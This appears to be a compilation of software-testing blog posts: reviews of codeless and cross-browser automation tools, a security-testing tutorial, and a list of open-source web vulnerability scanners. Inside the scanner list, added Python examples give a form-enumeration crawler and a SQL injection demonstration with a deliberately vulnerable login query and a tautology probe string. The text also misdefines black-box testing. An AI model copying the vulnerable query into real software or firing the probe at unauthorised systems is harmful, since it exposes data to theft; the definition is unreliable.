Pricing: Contact
EndTest
Endtest is a cloud platform where you can easily create, manage, and
run Automated Tests. With EndTest anyone can write complex
automated tests, without having to write code.

Features:
• Run the same test suite on any operating system, browser or
mobile device.
• Supports Parallel Execution
• Parameterized Testing
• It supports testing browser extensions
• Integrates with services like Bamboo, Travis CI, CircleCI,
TeamCity, Jenkins, GitHub, GitLab, etc.,
Website: EndTest
Pricing: It offers a free trial. Pricing starts at $138 / month
Mabl

Mabl is a unified intelligent test automation platform for the CI/CD ecosystem. Mabl enables easier test creation, execution, and control, thus increasing test coverage, development speed, and overall application quality.

As Mabl is very lightweight, it is really simple to execute tests and trigger them in a timely fashion. Along with its cool visuals, anomaly monitoring, and auto-healing concepts, Mabl keeps the automation scripts running stably regardless of any huge UI changes in the product code. Both testers and programmers can write scriptless tests by simply fetching data from the user’s recorded actions.

Highlight features:
• A fresh UI and design approach run tests periodically with
suggestions
• Reuse tests across different browsers
• Run infinite tests in parallel
• Testing nodes are scaled up in the cloud as you need them,
with real browser installations on virtual machines.
• The output consists of screenshots for relatively easy failure
troubleshooting
• Extensive data reports and insights
• JavaScript steps can be used for API requests and custom
assertions
• Integrates with tools like Jenkins, Bamboo, CircleCI, Slack.
Website: Mabl
Pricing: Contact sales
Applitools

Applitools provides an end-to-end UI testing solution powered by Visual AI, revolutionizing how organizations approach quality. It ensures web and mobile applications operate efficiently as designed across many devices, browsers, operating systems, or native applications.

Applitools can be quickly integrated with any DevOps environment, is easy to use by any team member, and is scalable to organizations of any size looking to speed up and increase quality at every release.
Highlight features:
• Cross-device and browser tests
• Support multiple programming languages
• Build functional test reports with screenshots, baseline images,
and easy zoom-in on changes
• Collaborate with your team by integrating your functional test
execution reports with Jira, Slack, and email.
• Baseline branching to push an up-to-date baseline along with
your code
• Web API and merge CLI tools to allow merging the source and
target baselines to resolve conflicts
• No inbound firewall changes or tunnel configuration required
• Integrates with the tools like Jenkins, CircleCI, TeamCity, Travis
and other CI systems.
• Open Jira tickets directly from the Applitools test manager.
Website: Applitools
Pricing: Contact sales
Usetrace

Usetrace is a regression testing automation software for Web applications. It builds robust cross-browser test suites consisting of reusable routines for efficient test maintenance. Regardless of your coding skills, you can reuse modules to speed up tests using Usetrace.
Moreover, Usetrace also offers additional features involving project management and collaboration, data analysis and reports, editor tracing, responsive testing, and synchronization & waiting.

Highlight features:
• Ease of creating traces
• Flexibility in maintaining traces
• Robust load balancing, performance and regression tests
without coding
• Its latest version is being tested all the time
• A visual dashboard to check how your site is doing
• Integrations with Slack, JIRA, Jenkins, Visual Studio Online,
GitHub, Codeship, Flowdock, Bitbucket, and HipChat
• Instant email or SMS alert if something happens
Website: Usetrace
Pricing: From $1,188/year
Leapwork

Leapwork is a cloud-based enterprise automation platform suitable for different technical levels, from testers, test managers, and business specialists to DevOps professionals. It empowers workforces to execute automated testing and processes across web applications, Windows applications, SAP applications, and more.

Leapwork flexibly facilitates intelligent automation, end-to-end verification, collaboration, and some integrated tools such as a graphical workflow editor and automated test builder – which I am sure will work remotely on an agent to build tests.

Highlight features:
• No need to adjust the automation flows anytime the system
under test alters
• Schedules start from DevOps by calling the REST API from
Powershell scripts
• Automate and test applications in any operating system,
browser version, desktop or mobile device
• It comes with built-in Sauce Labs and BrowserStack cloud
integrations for total coverage
• Clever strategy editor decides how to identify the GUI elements being manipulated
• When an ad hoc schedule gets stuck running and fills up the HDD, you have to restore the server from backup.
• It comes with native plugins for Jenkins, Azure Devops
Server/TFS, TeamCity, and Bamboo and can also be integrated
with bug management systems.
Website: Leapwork
Pricing: Contact sales.
Ranorex

Ranorex is one of the most comprehensive tools today that supports Web, Desktop (Windows only), and Mobile testing. Its customization with third-party frameworks serves both new users and high-level testers.

Siemens, Lufthansa, Cisco, Dell, and IBM, to name but a few, trust Ranorex to automate their testing. With Ranorex, you can create an all-in-one environment that can be easily extended with more innovations.

Highlight features:
• Automate complex GUI testing using object recognition and
following each user scenario
• Ranorex Recorder can record and playback actions through an
action table editor, then convert them into natural languages
• Selenium WebDriver integration flexibly fixes all pain points
Selenium still has
• Flexible test automation interface launching all executed .EXE
files from the command line
• Seamless integration with the most common CI tools such as
Jira, Jenkins, Bamboo, or TeamCity
• It supports standard programming languages such as VB.NET
and C#
• No macOS support
Website: Ranorex
Pricing: From $3,130/year
Conclusion:
To sum up, codeless automation testing can be called a vital practice that product teams should adopt and a must-have criterion for automation testing tools. Codeless test automation is the greatest solution for IT and business teams to fill the gap in technical level, eliminate testing bottlenecks, and reduce the time and effort spent on maintenance.
With its feature set, codeless test automation is viewed by QA experts as the solution of choice to ingrain into their existing DevOps cycle. Regardless of your role in your team and project, codeless tools will continue to advance, and you don’t want to miss out on them in 2020.


Happy Testing!

Security Testing Tutorial | Software Testing Material
What is Security Testing?
Security testing is a process to determine whether the system protects
data and maintains functionality as intended.

It is a type of Software Testing that aims to find out all possible loopholes and weaknesses of the system in the starting stage itself, to avoid inconsistent system performance, unexpected breakdowns, loss of information, loss of revenue, and loss of customers’ trust.
It comes under Non-functional Testing.

We can do this testing using both manual and automated security testing tools and techniques. Security testing reviews the existing system to find vulnerabilities.
Most companies test security on newly deployed or developed software, hardware, and network or information system environments. But experts highly recommend making security testing part of the information system audit process for an existing information system environment, so that all possible security risks are detected and developers are helped to fix them.

What are the major focus areas in Security Testing?
The following are the four major focus areas to be considered in terms of testing the security of a web application.

Network security:
Testers have to look for the vulnerabilities in the network infrastructure
(resources and policies).

System software security:
Testers have to assess the weaknesses in various software such as operating systems, databases, and other related software on which the application depends.
Client-side application security:
To make sure that the client browser and related tools are not
manipulated.

Server-side application security:
To make sure that the server and its related technologies are robust enough to block any vulnerabilities.

What are the principles of Security Testing?
It aims at covering the following basic security components:

1. Authentication
2. Authorization
3. Availability
4. Confidentiality
5. Integrity
6. Non-repudiation
Why is Security Testing Important?
Software security testing is important due to the increase in the number of privacy breaches that websites are facing today. In order to avoid these privacy breaches, software development organizations have to adopt this testing in their development strategy, based on testing methodologies and the latest industry standards.
It is important to adopt a Security Process in each and every phase of the SDLC.
• Requirement Phase: Security analysis of all the requirements
• Design Phase: Implementation of Test Plan including Security
tests.
• Code & Unit Testing: Security White Box Testing
• Integration Testing: Black Box Testing
• System Testing: Black Box Testing & Vulnerability Scanning
• Implementation of System Testing: Penetration Testing &
Vulnerability Scanning
• Support: Impact Analysis

Top Vulnerabilities:
Security tests include testing for vulnerabilities such as

• SQL Injection
• Cross-Site Scripting (XSS)
• Session Management
• Broken Authentication
• Cross-Site Request Forgery (CSRF)
• Security Misconfiguration
• Failure to Restrict URL Access
• Sensitive Data Exposure
• Insecure Direct Object Reference
• Missing Function Level Access Control
• Using Components with Known Vulnerabilities
• Unvalidated Redirects and Forwards
What are the Types of Security Testing?
There are seven main types of security testing, which are presented below.

Vulnerability Scanning:
In vulnerability scanning (aka vulnerability assessment), we just
identify and report the vulnerability using vulnerability scanning tools.

It’s the first step to improve the security of a system.

A vulnerability assessment report should contain the title, the description, and the severity of a vulnerability.

Security Scanning:
Security scanning is done to find weak points in the security of
network and system and also provides solutions to reduce these risks.
Penetration Testing:
In Penetration Testing (aka Pen test), we identify the vulnerabilities and attempt to exploit them using penetration testing tools. We repeat the same penetration tests until the system no longer fails any of them.

Pen testing can be divided into three techniques: manual penetration testing, automated penetration testing, and a combination of both manual and automated penetration testing.

Read more on Pen Testing Techniques


Risk Assessment:
Risk assessment involves reviewing and analyzing security risks that
later will be prioritized as Low, Medium, and High. It also recommends
possible ways to prevent risk.

Security Auditing:
Security auditing is the procedure of defining security flaws. It is an internal inspection of systems to find security flaws. In some cases, an audit is done via line-by-line inspection of code.

Ethical Hacking:
Ethical hacking is done on a system with the intent to find and expose security issues in the system. Ethical hacking is done by a white hat hacker. A white hat hacker is a security professional who uses their skills in a legitimate manner to reveal the defects of a system.

Read more: Types of Hackers


Posture Assessment:
Posture assessment is a combination of security scanning, ethical
hacking, and risk assessment to present the security posture of a
system or organization.

Techniques for security testing
Techniques/Methodologies followed in Security Testing are as follows.
Black Box Testing:
In Black Box testing, testers are authorized to do testing on everything about the network topology and the technology.

Grey Box Testing:
In Grey Box testing, testers are provided with partial information about the system. It is a hybrid of the white and black box models.

Tiger Box Testing:
It is done on a system that has a collection of operating systems and hacking tools. It helps security testers conduct vulnerability assessments and attacks.
Security Testing Tools:
To find the flaws and vulnerabilities in a web application, there are many free, paid, and open-source tools available in the market. We know that the advantage of open source tools is that we can easily customize them to match our requirements. We are here to showcase some of the top 12 open-source security testing tools.
We use these testing tools to check how secure a website or web application is.

Open Source Security Testing Tools:
Some of the open-source tools are Zed Attack Proxy, Wfuzz, Wapiti, etc.
Commercial Security Testing Tools:
Some of the commercial tools are GrammaTech, Appscan, Veracode, etc.
To learn more you can also check the OWASP (Open Web Application Security Project) site.
Conclusion:
We know how important security testing is these days. It aims to find out all possible loopholes and weaknesses of the system. Testers play the role of an attacker to find security-related bugs in the system.

If you have any queries, please comment below.



Top 12 Open Source Security Testing Tools for Web Applications in 2020
As a Software Tester of many years, I am always keen to test out new
Software Testing Tools that can help me build awesome websites. I am so
excited to bring these open source security testing tools before you through
this post.

Note: You should only use these Security Testing Tools to attack an
application that you have permission to test.

In this post, we are going to see the following:

• 1. What is Security Testing
• 2. Zed Attack Proxy
• 3. Wfuzz
• 4. Wapiti
• 5. W3af
• 6. Vega
• 7. SQLMap
• 8. SonarQube
• 9. Nogotofail
• 10. Grabber
• 11. Arachni
• 12. Skipfish
• 13. Ratproxy
Here are some of the Open Source Security Testing Tools which are
popular among Security Testers.

What is Security Testing?
Security testing is a process to determine whether the system protects data and maintains functionality as intended. Penetration testing or pen testing is also a type of Security testing which is performed to evaluate the security of the system (hardware, software, networks or an information system environment).

We can do security testing using both manual and automated security testing tools and techniques. Security testing reviews the existing system to find vulnerabilities.

Most companies perform security testing on newly deployed or developed software, hardware, and network or information system environments. But experts highly recommend making security testing part of the information system audit process for an existing information system environment.

Must Read: Security Testing – Complete Guide

To find the flaws and vulnerabilities in a web application, there are many free, paid, and open source security testing tools available in the market. We know that the advantage of open source tools is that we can easily customize them to match our requirements. We are here to showcase some of the top __ open source security testing tools.

We use security testing tools to check how secure a website or web application is.
Security tests include testing for vulnerabilities such as SQL Injection, Cross-Site Scripting (XSS), Session Management, Broken Authentication, Cross-Site Request Forgery (CSRF), Security Misconfiguration, Failure to Restrict URL Access, etc.

Website hacking is quite common nowadays. Every now and then there is news about a website being hacked or a data breach. Infosec (information security) has come a long way, and so has hacking. To keep a website safe from hackers we need to build secure websites. Web Security Testing Tools act proactively in detecting web application vulnerabilities and safeguarding websites against attacks. There are many paid and free web application testing tools available in the market. Here, we discuss the top 12 open source security testing tools for web applications.
1. Zed Attack Proxy (ZAP)
Zed Attack Proxy popularly known as ZAP is an open source security
testing tool for a web application which was developed by OWASP
(Open Web Application Security Project). It runs on all operating
systems that support Java 8. It is one of the world’s most popular free
security tools and is actively maintained by volunteers. It is an easy to
use integrated penetration testing tool for finding a number of security
vulnerabilities in a web application while we are developing and testing
an application. It is also a great tool for experienced pentesters to use
for manual security testing. It is designed to be used by people with a
wide range of security experience and as such is ideal for developers
and functional testers who are new to penetration testing as well as
experienced security professionals. It comes with a friendly GUI which
helps newbies as well as experts. It gives command line access for
advanced users.
ZAP has a huge reputation amongst Security Testing Tools as being easy to use, and powerful.
Highlights:
• Easy to use
• Easy to install
• Free, Open source
• Cross-platform
• Internationalized
Key features of ZAP are:
• Automatic scanning
• Rest-based API
• Intercepting proxy
• Authentication Support
• Ajax Spider
• Dynamic SSL Certificates
• SQL Injection
• XSS Injection
• Forced Browsing
• Fuzzing
• Web Socket Support
• Active and Passive scanners
• Cookie-based and HTTP authentication session management
• Anti CSRF token handling
Website Link: https://www.zaproxy.org/
2. Wfuzz
Wfuzz is a web application security fuzzer tool developed in Python. It doesn’t come with a GUI, so security testers who want to use this tool have to work on the command line. This tool is designed for brute-forcing web applications.

Key features of Wfuzz are:
• Multiple injection points with multiple dictionaries
• Post, headers and authentication data brute forcing
• Output to HTML
• Cookies fuzzing
• Multithreading
• Proxy Support
• SOCKS Support
• Time delays between requests
• Authentication Support (NTLM, Basic)
• All parameters bruteforcing (POST and GET)
• Multiple encoders per payload
• Baseline request (to filter results against)
• Brute force HTTP methods
• Multiple proxy support (each request through a different proxy)
• HEAD scan (faster for resource discovery)
Website Link: http://www.edge-security.com/wfuzz.php
Source code Download Link: https://github.com/xmendez/wfuzz
3. Wapiti
Wapiti is a web application vulnerability scanner. It allows us to audit the security of websites or web applications. It performs black box scans of the web application by crawling the web pages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets the list of URLs, forms and their inputs, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable. This open source security testing tool supports both GET and POST HTTP attack methods. It is a command line application and doesn’t come with a GUI, so it is important to know the various Wapiti commands. There is detailed documentation on the Wapiti official site.
It detects vulnerabilities like

• File disclosure
• Data injection
• XSS (Cross Site Scripting) injection
• XXE (XML External Entity) injection
• CRLF injection
• SSRF(Server Side Request Forgery)
• Bypass weak .htaccess configurations
• Shell shock (aka Bash Bug)
Key features of Wapiti web vulnerability scanner are:
• Supports both GET and POST HTTP methods for attacks
• Acts like a fuzzer
Website Link: http://wapiti.sourceforge.net/
Source Code Download Link: https://github.com/mbarbon/wapiti
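The crawl step described above (collect the forms and their inputs before any payload is sent) as an added Python example, not Wapiti’s own code: it inventories every form on a page, which is also the input surface a QA team needs to enumerate when planning the security test cases for an application. The base URL and the HTML page are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

# Control types that carry no user-supplied value, so they are not injection points.
NON_DATA_TYPES = {"submit", "button", "image", "reset"}


class FormCollector(HTMLParser):
    """Collects every <form> on a page with its resolved action URL,
    HTTP method and the names of the controls it submits."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self._current = None  # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                # A missing or empty action submits back to the page itself.
                "action": urljoin(self.base_url, a.get("action") or ""),
                # HTML defaults to GET when no method attribute is given.
                "method": (a.get("method") or "get").upper(),
                "inputs": [],
            }
        elif tag in ("input", "textarea", "select") and self._current is not None:
            name = a.get("name")
            ctype = (a.get("type") or "").lower()
            # Hidden fields are kept: they reach the server just like visible ones.
            if name and ctype not in NON_DATA_TYPES:
                self._current["inputs"].append(name)

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def discover_forms(base_url, html):
    """Parse one page and return its forms as a list of dicts."""
    parser = FormCollector(base_url)
    parser.feed(html)
    parser.close()
    return parser.forms


def injection_points(forms):
    """Flatten forms into (url, method, parameter) triples, one per input."""
    return [(f["action"], f["method"], name) for f in forms for name in f["inputs"]]


# Constructed sample page and base URL (placeholders, not a real site).
BASE_URL = "http://example.test/app/index.php"
SAMPLE_HTML = """
<html><body>
<form action="/login" method="post">
  <input type="hidden" name="csrf_token" value="abc123">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Log in">
</form>
<form action="search.php">
  <input name="q">
  <button type="submit">Search</button>
</form>
</body></html>
"""

if __name__ == "__main__":
    for url, method, param in injection_points(discover_forms(BASE_URL, SAMPLE_HTML)):
        print(f"{method} {url} param={param}")
```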
4. W3af
W3af is a web application attack and audit framework developed in Python. It is one of the most popular web application security testing frameworks in the market. It comes with both GUI and console interfaces. It helps developers and penetration testers identify and exploit vulnerabilities in web applications. It supports authentication types such as HTTP basic authentication, NTLM authentication, Form authentication, and Cookie authentication. It is able to identify more than 200 types of security issues in web applications, including

• Cross-Site Scripting
• SQL Injection
• Guessable credentials
• Unhandled application errors
• PHP misconfigurations
• Blind SQL injections
• Buffer overflow vulnerability
• CORS (Cross-Origin Resource Sharing)
• CSRF (Cross Site Request Forgeries) vulnerabilities
• OS Commanding
• Authentication support
Website Link: http://w3af.org/
Source Code Download Link: https://github.com/andresriancho/w3af
5. Vega
Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. It is written in Java, has a well-designed graphical user interface (GUI), and runs on Linux, OS X, and Windows.

It exposes vulnerabilities including
• Find and validate SQL injection
• Cross-Site Scripting (XSS) injection
• Blind SQL injection
• Header injection
• Remote file include
• Shell injection
Website Link: https://subgraph.com/vega/
Source Code Download Link: https://github.com/subgraph/Vega
6. SQLMap
SQLMap is an open source penetration testing tool. It allows us to
automate the process of detecting and exploiting SQL injection
vulnerabilities in a website’s database. It comes with a powerful
detection engine and many features to detect vulnerabilities.

It supports 6 types of SQL Injection techniques:

• Boolean-based blind
• Time-based blind
• Error-based
• Union query-based
• Stacked queries
• Out-of-band
It supports a large number of database services such as
• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server
• Microsoft Access
• IBM DB2
• SQLite
• Firebird
• Sybase
• SAP
• MaxDB
• Informix
• HSQLDB
• H2
Website Link: http://sqlmap.org/
Source Code Download
Link: https://github.com/sqlmapproject/sqlmap
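SQL Injection heads the list of top vulnerabilities above, and the boolean-based and error-based techniques that SQLMap applies only work because a query was built by splicing user input into SQL text. The following Python is an added example, not code from the page or from the SQLMap project: a deliberately vulnerable login query beside its parameterized fix, plus two security tests that feed each one the kind of probe value a scanner would. The users table, passwords and probe are constructed for the demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration: two users in an in-memory table.
SAMPLE_USERS = [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")]


def make_db():
    """Create a throwaway in-memory database with a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: user input is spliced into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_hardened(conn, username, password):
    """Fixed version: input is bound as a parameter and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# The classic boolean-based probe: a tautology that turns the WHERE clause true.
BOOLEAN_PROBE = "' OR '1'='1"


def resists_boolean_probe(login):
    """True when the probe authenticates nobody (the secure outcome)."""
    conn = make_db()
    # Functional sanity checks: the login still works for a real user.
    assert login(conn, "alice", "s3cret") == ["alice"]
    assert login(conn, "alice", "wrong") == []
    return login(conn, BOOLEAN_PROBE, BOOLEAN_PROBE) == []


def leaks_syntax_error(login):
    """Error-based signal: a lone quote breaks the statement only when the
    input is being parsed as SQL, so a database error points to injection."""
    conn = make_db()
    try:
        login(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    for name, fn in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        print(f"{name}: resists boolean probe={resists_boolean_probe(fn)}, "
              f"syntax error on quote={leaks_syntax_error(fn)}")
```

The same two checks, written against a real login endpoint instead of a local function, are the security test cases a scanner automates; the fix is always the parameterized query, never input filtering alone.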
7. SonarQube
SonarQube is an open source security testing tool developed by
SonarSource. It is an automatic code review tool to detect bugs,
vulnerabilities and code smells in your code.

Key features of SonarQube are
• Continuous inspection
• Detect Tricky issues
• Multi-Language support
• DevOps Integration
• Centralize Quality
Website Link: https://www.sonarqube.org/
Source Code Download
Link: https://github.com/SonarSource/sonarqube
8. Nogotofail
Nogotofail is a network security testing tool (network vulnerability
scanner tool) designed to help developers and penetration testers. As
a network security scanner, it includes testing for common SSL
certificate verification issues, HTTPS and TLS/SSL library bugs, SSL
and STARTTLS stripping issues, cleartext issues, and more.

Vulnerabilities exposed by Nogotofail network testing tool are

• SSL Injection
• TLS Injection
• SSL Certificate verification issues
• SSL and STARTTLS stripping issues
• Cleartext issues
Website Link: https://security.googleblog.com/2014/11/introducing-nogotofaila-network-traffic.html
Source Code Download Link: https://github.com/google/nogotofail
9. Grabber
Grabber is an open source web application scanner that detects some
kinds of vulnerabilities in a website or web application. It is designed
to scan small websites such as forums and personal websites. It is
absolutely not for big applications: it will take too long and flood
your network when you use it for a big application. It doesn’t come
with a GUI. It was developed in Python.

Grabber can identify the following issues:

• Cross-site scripting
• SQL injection
• File inclusion
• Backup files check
• Simple AJAX check
• Hybrid analysis or Crystal ball testing for PHP application using
PHP-SAT
Website Link: https://tools.kali.org/web-applications/grabber
Source Code Download Link: https://github.com/amoldp/Grabber-Security-and-Vulnerability-Analysis-
10. Arachni
Arachni is an open source security testing tool aimed at helping
penetration testers and administrators evaluate the security of web
applications. It is a full-featured, modular, high-performance Ruby
framework. It supports all major operating systems such as MS
Windows, Mac OS X, and Linux. It is designed to identify security
issues within a web application and make it hacker proof.

Arachni can identify the following issues:

• Local file inclusion
• Remote file inclusion
• Unvalidated redirects
• Unvalidated DOM redirects
• XPath injection
• SQL injection
• XSS injection
Website Link: http://www.arachni-scanner.com/
Source Code Download Link: https://github.com/Arachni/arachni
11. Skipfish
Skipfish is an active web application security testing tool. It prepares
an interactive sitemap for the targeted site by carrying out a recursive
crawl and dictionary-based probes. It is available for Linux, Mac OS X,
and Windows.

Some of the security checks offered by Skipfish are:

• Server-side query injection
• Explicit SQL-like syntax in GET or POST parameters
• Server-side shell command injection
• Server-side XML/XPath injection
• Password forms submitting from or to non-SSL pages
• Incorrect or missing MIME types on renderables
Website Link: https://tools.kali.org/web-applications/skipfish
Source Code Download Link: https://github.com/spinkham/skipfish
12. Ratproxy
Ratproxy is an open source security testing tool. It is a semi-
automated, largely passive web application security audit tool.
Ratproxy assessments take little bandwidth or time to run and proceed
in an intuitive, distraction-free manner. It affords a consistent and
predictable coverage of user-accessible features. It is supported by all
popular operating systems such as Mac OS X, Windows, and Linux.
Website Link: https://sectools.org/tool/ratproxy/
Source Code Download Link: https://github.com/wallin/ratproxy
Conclusion:
We tried our best to bring a list of the top 12 Open Source Security
Testing Tools (vulnerability scanning tools/vulnerability assessment
tools) for web applications. Which is your favorite security testing
tool? Tell us in the comments. If you feel I forgot to mention any of
your favorite tools, let us know in the comments below. We will try to
include it in our list and update this post.


Cross-browser Testing using CrossBrowserTesting Tool | Review By STM
Review of CrossBrowserTesting Tool by SoftwareTestingMaterial
Testing things across browsers is part of the job of Software Testing. As
testers, we do want to verify our applications on multiple browsers. Recently,
I had the requirement to test the behavior of a web application on different
browsers. We usually cannot have all the browsers on one machine. Each
browser is designed by a different vendor, so each browser has its own
features to showcase its unique presence. While testing a website, we
need to ensure that our website appears the same across all the browsers.
To do this we need to have all the browsers. Installing all of them costs a
lot of time and money. Fortunately, there is a solution that avoids this
cumbersome installation process and the unnecessary expense. The solution
is CrossBrowserTesting.com. While searching online for cross browser test
tools, I came across CrossBrowserTesting and tried their free trial. I found
it very useful to run my tests on different browsers, both manually and in
an automated way.
Introduction to CrossBrowserTesting Tool:

CrossBrowserTesting has a wide range of different browsers and their
versions. It is available for multiple OSes. It supports over 1500 real
desktop and mobile browsers. CrossBrowserTesting is a perfect tool to
perform Cross Browser Testing, and it provides the easiest way to get
started. Use CrossBrowserTesting to automate your web testing on real
mobile and desktop browsers. You get access to the combinations of
browser, OS, resolution, and device your customers are using. The
CrossBrowserTesting interface is simply awesome. You don’t need to do
much to set up browsers and operating systems. Imagine you would like
to test your website using Internet Explorer 11 on a Windows 8.1
machine: CrossBrowserTesting lets you select the required browser and
operating system to do so. Assume there is a requirement where you
need to switch from Internet Explorer 11 to Google Chrome 61; you just
need to change a few settings to start testing on your required
environment. It is one of the most popular commercial cross-browser
testing tools. No need to worry about virtual machines. Once connected
to CrossBrowserTesting you are able to test your site on the
environment you would like. It offers cloud-based automated and manual
testing on real browsers. Other features it offers are recording
videos, capturing screenshots and integration with Slack, Jira and
HipChat.
Installation of CrossBrowserTesting Tool:

Step 1: Open this link.
Step 2: Click on the ‘Start Testing Now 7 Day Free Trial‘ button
Step 3: Enter a valid email id and password and click on ‘Create Your
Free Account‘.

CrossBrowserTesting.com Tool Plans:

It offers multiple plans such as Live Testing, Automated Testing, and
Unlimited Testing. Choose a plan based on your requirement. Prior to
this, you could try their 7 day free trial.

Features of CrossBrowserTesting Tool:

Live Tests: Allows you to test the functionality and appearance of your
site. You could test a real browser via an interactive remote testing
session. Great for verifying functionality and appearance of a site.
Pass a URL and select the required browsers and versions, either
Desktop or Mobile, on which you want to start testing the functionality
of your site.
Step 1: Click ‘Live Testing‘ from the left sidebar
Step 2: Enter Your URL ‘SoftwareTestingMaterial.com‘
Enter the URL of the page you’d like to test. If the page is behind a
firewall or on a local server, please make sure to Enable Local
Connection in the top right.
Step 3: Select Your ‘Operating System‘, ‘Browser‘, and
‘Responsive mode‘
Select from Windows, Mac, even Ubuntu. If you’d like to test a mobile
device, select from the list of real Android or iOS devices or one of
many mobile emulators. Choose the browser and resolution you’d like
to test in CrossBrowserTesting.
Step 4: Click ‘Run Test‘
The OS or mobile device requested will appear on the screen in a
matter of seconds and load your URL for viewing, navigating, and
debugging with developer tools.

Here I have chosen Windows 8.1 OS and Internet Explorer 11 browser.

In the above screenshot, you could see the website
‘softwaretestingmaterial.com’ opened in Internet Explorer 11 browser
on Windows 8.1 with Resolution 1280×960.
We could also update the OS, Browser, and Resolution.

Here I am updating the browser from IE 11 to Google Chrome 61.

Screenshots: Allows you to capture screenshots of a URL across multiple
browsers and OSes. Pass a URL and select the required browsers and
versions, either Desktop or Mobile. Screenshots of your URL will
appear in a few minutes.
Step 1: Click ‘Screenshots‘ from the left sidebar
Step 2: Enter Your URL ‘SoftwareTestingMaterial.com‘
Enter the URL of the page you’d like to test. If the page is behind a
firewall or on a local server, please make sure to Enable Local
Connection in the top right.
Step 3: Choose your browsers and options.
Step 4: Click ‘Run Test‘ and the screen will flip to the Results page
while processing, ultimately delivering the results on-screen.

In the above screenshot, you could see the following:

1. Details of the test result: 6 Successful out of 6 Screenshots
2. Features to see windowed size screenshots, full page
screenshots, chromeless screenshots and other settings
3. Options to share a link, send email and share on Slack, Hipchat,
and Jira
Automated Tests: Allows you to test your web pages by automating the
browser via Selenium. You could create a new Selenium test or use
your existing Selenium test scripts on real browsers and devices right
in the cloud. In the next post, we will see how to run Selenium scripts
using CrossBrowserTesting.
Integrations: Integrate apps into CrossBrowserTesting.com to
automatically trigger notifications and manually share test results. It
supports Slack, Jira, and HipChat.
Over to you.
Give the CrossBrowserTesting.com free trial a go and see if you like it.
I am sure you will become a paid customer of CrossBrowserTesting.com
after you have experienced it.

Best Automation Testing Tools in 2020 (Top 10+ reviews)
In this post, we will see the Best Automation Testing Tools for 2020.

Software development practices change over time, and so do the tools
and technologies. Such changes aim to improve productivity, quality,
and customer satisfaction, to tackle ever-shorter delivery times, and to
deliver successful products and services. Software testing obviously
plays an important role in achieving these objectives.

The recently released World Quality Report 2017–2018 by Capgemini,
Sogeti, and Micro Focus points out several interesting trends in
software quality and testing. Two of three key trends are increasing
test automation and widespread adoption of agile and DevOps
methodologies. As the report shows, organizations need intelligent
automation and smart analytics to speed up decision making and
validation and to better address the challenges of testing smarter
devices and products that are highly integrated and continuously
changing. The report also suggests the need for smart test platforms
that are self-aware and self-adaptive to support the complete
application lifecycle.
In the test automation landscape, automation tools certainly take
center stage. This post summarizes the top test automation tools and
frameworks that have the potential to help organizations best
position themselves to keep pace with the trends in software testing.
The list includes both open-source and commercial test automation
solutions.
List of Popular Automation Testing Tools:
Here I am going to list the tools used for automation testing; the list
contains both free and commercial ones.

1. Kobiton
2. Selenium
3. Subject7
4. Ranorex
5. LambdaTest
6. Katalon Studio
7. UFT
8. Watir
9. IBM Rational Functional Tester
10. TestComplete
11. EggPlant
12. Tricentis Tosca
13. Robot Framework
Now that you know the list, let us take a look at each of them in detail.

Best Automation Testing Tools

1. Kobiton:

Kobiton’s mobile device testing platform accelerates the testing and
delivery of mobile applications by offering live device testing in the
cloud. Through their Intelligent Test Automation, a scriptless
automation solution, Kobiton enables companies to conduct the
extensive, automated real-device testing necessary to create flawless
experiences for all users on all devices.

Features:
• Scriptless Appium automation
• Automated crash detection
• Visual validation for a pixel-perfect app on all devices
• Recommendation Engine powered by AI to help the tester
Website: Kobiton
To learn Kobiton, read our detailed Kobiton Tutorial.
2. Selenium:

Selenium is possibly the most popular open-source test automation
framework for Web applications. Having originated in the 2000s and
evolved over a decade, Selenium has been an automation framework
of choice for Web automation testers, especially for those who
possess advanced programming and scripting skills. Selenium has
become a core framework for other open-source test automation tools
such as Katalon Studio, Watir, Protractor, and Robot Framework.

Selenium supports multiple system environments (Windows, Mac,
Linux) and browsers (Chrome, Firefox, IE, and headless browsers). Its
scripts can be written in various programming languages such as
Java, Groovy, Python, C#, PHP, Ruby, and Perl.
While testers have flexibility with Selenium and can write complex
and advanced test scripts to meet various levels of complexity, it
requires advanced programming skills and effort to build automation
frameworks and libraries for specific testing needs.

Website: Selenium
License: Open-source
To learn Selenium, read our detailed Selenium Tutorial.
3. Subject7

Subject7 is a state-of-the-art cloud-based platform for end-to-end test
automation which covers web, native mobile, desktop, database, web
services (REST and SOAP), load testing, security testing,
508/accessibility testing, manual testing, and much more. The
Subject7 Platform provides end-to-end test automation capabilities
through a series of commands. These commands are available via an
easy-to-use web interface, hiding the complexities of industry-standard
packages such as Selenium, Appium, SikuliX, JMeter, ZAP, and
others.
Subject7 Player, which executes these automation commands, is
available on users’ machines (for authoring and debugging), in the
cloud for parallel execution, as a load-generating engine, and for
active or passive security checks, all using the same commands,
making automation uniform across the board.

Extensive APIs allow for integration into JIRA, Jenkins, GitHub, or any
DevOps platform for test automation in real time. It is further available
on public, protected, or private clouds (i.e. on-premises).

Website: Subject7
Pricing: Commercial SaaS
4. Ranorex

Ranorex Studio is an all-in-one test automation tool for desktop,
